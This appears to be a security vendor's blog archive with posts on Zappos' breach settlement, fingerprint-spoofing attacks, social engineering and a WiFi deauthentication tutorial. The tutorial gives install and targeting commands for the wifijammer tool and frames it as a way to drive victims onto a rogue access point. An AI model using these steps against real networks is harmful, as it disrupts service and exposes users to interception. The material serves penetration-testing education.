Zappos Ordered to Pay Fine in Wake of Breach

The office of Massachusetts Attorney General Martha Coakley’s Consumer Protection Division has recently announced the details of a $106K multi-state settlement reached with online retailer Zappos, which in 2012 was the target of a widely publicized attack that exposed the personal information of over 24 million users. The Attorney General’s office’s investigation found potential violations of the state’s data protection laws after data including consumer’s email addresses, names, and shipping addresses were stolen; though no evidence was found that financial information was stolen.

While data security should always be of the utmost importance to an organization, this settlement is yet another clear reminder of the consequences for failing to protect the information of your customers.

 

Settlement Requirements

Aside from the fine, which must be paid in 30 days, the settlement also requires Zappos to:

 

  • Provide annual security training to employees
  • Maintain and adhere to information security policies
  • Provide Attorney General with customer information security policy
  • Demonstrate compliance with the Payment Card Industry Data Security Standard
  • Obtain a third-party security audit and provide report of findings to Attorney General

 

Having a strong security policy, properly training employees, and seeking out third-party security audits should be common operating procedure for any retailer; if there is anything surprising about this settlement it’s that these steps were not already being adhered to internally at Zappos.

 

Growing Trend

Litigation is increasingly the end result for corporate data breaches, and this isn’t the first investigation that Coakley’s Consumer Protection Division has had a hand in. They’ve been involved in a number of high profile cases, including the data breaches at Target and TD Bank.

In a press release, Coakley stated: “Our office will continue to hold retailers accountable for failing to follow their own policies regarding consumer data that they maintain, and make sure that all companies have reasonable data security measures in place.”

With groups like Coakley’s Consumer Protection Division aggressively prosecuting businesses (online and off) that fail to properly secure their customer’s information, it’s likely we’ll only be seeing more cases like this in the future. While it would be better for all involved if these attacks never occur, the biggest mistake would be to not learn from them; with luck, the public relations fallout from these attacks will help ensure other retailers take steps to more vigorously protect their customers.

Mobile WiFi Jamming (Disrupting WiFi Networks with Mobile Devices)

Disrupting WiFi Networks with Mobile Devices

 

At this point, everyone should be pretty familiar with the “rogue AP” concept: an attacker creates an innocent enough looking WiFi access point, hopes people connect to it, and then does nasty things when they do. It’s simple to setup, hard for the average user to detect, and increasingly common.

But putting up an access point is only half the battle. How do you get victims to actually connect to an rogue AP once it’s setup? An attacker can give it a tempting name, and if it’s the only open AP in an area with nothing but encrypted networks it may have a shot, but more often than not the client machines are going to connect to whatever their appropriate network is and ignore any other APs that may have popped up. So the question is, how could one nudge an unsuspecting user off of their own WiFi network and onto another one?

One way is to simply blast the rival networks off the air.

 

Air Superiority

To be very clear, calling this technique jamming is inaccurate, but that hasn’t stopped a number of developers from using the term, so we’ll just play along for the sake of consistency. To properly jam WiFi (or any other form of radio communication), you basically blast out a lot of random noises on the frequencies that particular technology uses. It’s conceptually very simple, but also a very big infraction as far as our friends at the Federal Communications Commission are concerned; so it isn’t something you won’t be doing with any consumer-level WiFi hardware.

Since jamming on the hardware level is out of the question, a number of developers have found a way to clog up WiFi communications in software. This is much more akin to a denial of service attack, where tools are used to repeatedly spam deauthentication packets at WiFi access points and clients to force them to disconnect. With the appropriate software and a powerful WiFi adapter that supports packet injection, an attacker can put a stranglehold on legitimate communications.

There are a couple of ways it can be done, but for this example we will look at wifijammer by Dan McInerney.

 

Installing Wifijammer

This tool takes the form of a single Python script, wifijammer.py, that you can grab right from GitHub. Installing it on your device is as simple as opening the terminal and running:

git clone https://github.com/DanMcInerney/wifijammer.git

Jammer1

Once you’ve cloned the Git repository and entered the newly created directory, you should be able to run it right away. Unfortunately, when you try and run it you’ll probably get an error about not being able to find “./dvips”.

Jammer2

A little digging around shows this is actually a bug in the python-pyx package that’s been floating around since at least 2012. You can get around this by simply removing the python-pyx package with “apt”, but that will also remove wifitap, which you may not want to do.

In the end, as silly as it sounds, the easiest workaround for this bug is to simply create an empty directory named “dvips” so it finds what it’s expecting:

 

mkdir ./dvips

 

After creating the directory (or removing python-pyx), you just need to plug in your external WiFi adapter and you’re set.

Note: In testing, it has been found that unplugging the external WiFi adapter after running wifijammer has a tendency to lock up the device. It’s suggested that you shutdown the device before disconnecting the external adapter to prevent data loss.

 

Radius Jamming

If ran with no options, wifijammer will select the strongest WiFi interface on your device that supports packet injection (your external WiFi adapter) and puts it into monitor mode. It will spend a few seconds on each WiFi channel collecting data, and then once it has a list of clients and APs, it starts rapidly going through them and firing out deauthentications.

The top of the screen will show the devices that have been deauthenticated, while the bottom of the screen will continually scroll devices that wifijammer has detected.

Jammer3

With a powerful external WiFi adapter, a setup like this will destabilize the WiFi networks within a fairly large radius, say a few hundred feet.

But it’s a completely non-discriminatory attack, it will try to knock out every WiFi network it sees. It may however be advantageous to try and jam one specific access point, or perhaps even just one client device. In other cases the broad radius attack may fail, and a more direct approach is required. For those situations, wifijammer has a number of options to tailor the attack to the situation at hand.

 

Targeted Jamming

The advanced parameters for wifijammer let you specify things like the target’s MAC address and channel, as well as some under the hood options like how many packets to send and how long to wait between deauthentications.

A good starting point for experimentation is something like the following:

 

wifijammer -c <CHANNEL> -a <TARGET MAC> -p 5 -d

 

Aside from the obvious channel and target variables, the -p option tells wifijammer to send 5 deauthentication packets at a time, and the -d option disables sending deauthentication packets to broadcast addresses (this speeds up the attack, and many devices ignore them anyway).

 

Practical Use

In practice, tools like wifijammer can be used to disable some or all of the WiFi networks in the target area, which can lead unsuspecting users to an rogue AP under an attacker’s control. It’s important to realize that attacks like this cannot literally force a target to switch networks (they would still need to select the rogue AP in their device’s network settings), but it may give them the impetus to check for additional networks where they otherwise wouldn’t have.

When deployed from a mobile device like the Pwn Pad or Pwn Phone, WiFi jamming attacks can be especially effective, as the source of the transmission can be brought in extremely close to the targets (such as in a coffee shop, office, or other public place) without arousing suspicion.

Rethinking Biometric Security

For many, biometrics are considered the ultimate form of two-factor authentication; where a user must provide something they know in addition to something they have. Most systems currently implement two-factor authentication with security tokens, which can either take the form of a hardware device (such as the RSA SecurID fob) or software running on a smartphone (Google Authenticator), both of which have their logistical problems. Supplanting these tokens with something that is literally part of the user, such as a fingerprint or iris scan, would take a lot of the implementation headaches out of two-factor authentication.

But new attacks have shown that the most common form of biometric authentication, fingerprint scanning, are not nearly as secure as originally thought. The next generation of scanners aim to increase security, but is it too little too late?

 

High Profile Vulnerabilities

Hacking fingerprint scanners by cloning fingerprints is hardly new, but it definitely got a lot of mainstream attention when it was shown that Apple’s iPhone 5S was susceptible to this type of attack just days after its release. Chaos Computer Club member Jan “Starbug” Krissler created a detailed guide on a how a print could be “lifted” from a smooth surface (such as a drinking glass) and reproduced in a form that can be glued to an attacker’s own finger. A video was released that even showed how to recover a usable fingerprint from the iPhone’s screen using nothing more exotic than a desktop scanner.

These hacks were by no means simple, they required patience, skill, and even some volatile chemicals. But it was very much possible, and anyone who had the drive to follow the widely available information could replicate it on their own without much expense. If somebody wanted into your iPhone badly enough, it was clear they could do it.

Many hoped that the iPhone 6 would pack in a more sensitive fingerprint scanner that would be harder to trick, but upon its release, it was demonstrated that the same method worked on the newer device as well.

But to many, this didn’t come as a surprise. The fingerprint scanner on the iPhone is meant to be more convenient, but not necessarily more secure, than simply using a traditional PIN to unlock the device. For the average user, the iPhone’s fingerprint authentication would work fine, but it shouldn’t be relied on for high security applications.

 

Hands Free Hack

As if his attack against the iPhone wasn’t enough, Krissler has recently released information on how he was able to to create a duplicate fingerprint using nothing more than high resolution images of the target’s hands.

In his demonstration at the 31st Chaos Communication Conference, Krissler showed how he was able to use images of German Defense Minister Ursula von der Leyen’s thumbs and the commercially available VeriFinger SDK to create a replica of her fingerprint without ever having access to a physical object she touched. Given the availability of high resolution images of public figures, this attack could conceivably have long reaching security implications.

During his presentation, Krissler quipped that “After this talk, politicians will presumably wear gloves when talking in public.” While the statement was in jest, it will be interesting to see if policy on photographing public officials will be in anyway impacted by Krissler’s work.

 

Next Generation Hardware

With attacks like these already in the wild, it’s clear that fingerprint authentication needs to be rethought. New approaches to fingerprint scanning include what are known as “living biometrics”, where it isn’t enough to simply have an image of a fingerprint, the scanner must also see evidence of living processes.

One such method is finger vein recognition, where the veins in the finger (which are as unique to each individual as the fingerprint itself) are photographed through the use of infrared light. Since the veins are under the skin, there’s no way to duplicate them using images of the hands or prints lifted off of glass, as these only give surface details.

While the technology and method is still being actively researched, the results so far are very promising. Britain’s Barclays bank has announced that this year they will be making vein recognition systems available to their commercial customers, with a full rollout to follow if it’s successful.
While it will be quite some time before we see vein recognition hardware on our smartphones, the technology will one day become common enough that a user’s finger may still end up being as worthwhile a security token as anything currently available.

Social Engineering: The dangers of positive thinking

CSO Online

Social Engineering: The dangers of positive thinking

Jan 5, 2015

By Steve Ragan

 

The assumption that everything’s okay is a risky one

CSO Online recently spoke to a person working in the security field with a rather unique job. He’s paid to break into places, such as banks and research facilities (both private and government), in order to test their resistance to social engineering and physical attacks.

Rarely is he caught, but even when he is it doesn’t matter, and the reason for his success is the same in each case – human nature.

Caught on film:

When the surveillance video starts playing, the images show a typical day at a bank somewhere in the world. Business is steady, but the lobby isn’t overly packed with customers, so a single teller is working the window.

(Original Article)

Happy New Year!

The Pwnie Express team wishes you a Happy New Year, and will be back with our usual content next week.

 

It’s been a great 2014, and we can’t wait to see what’s in store!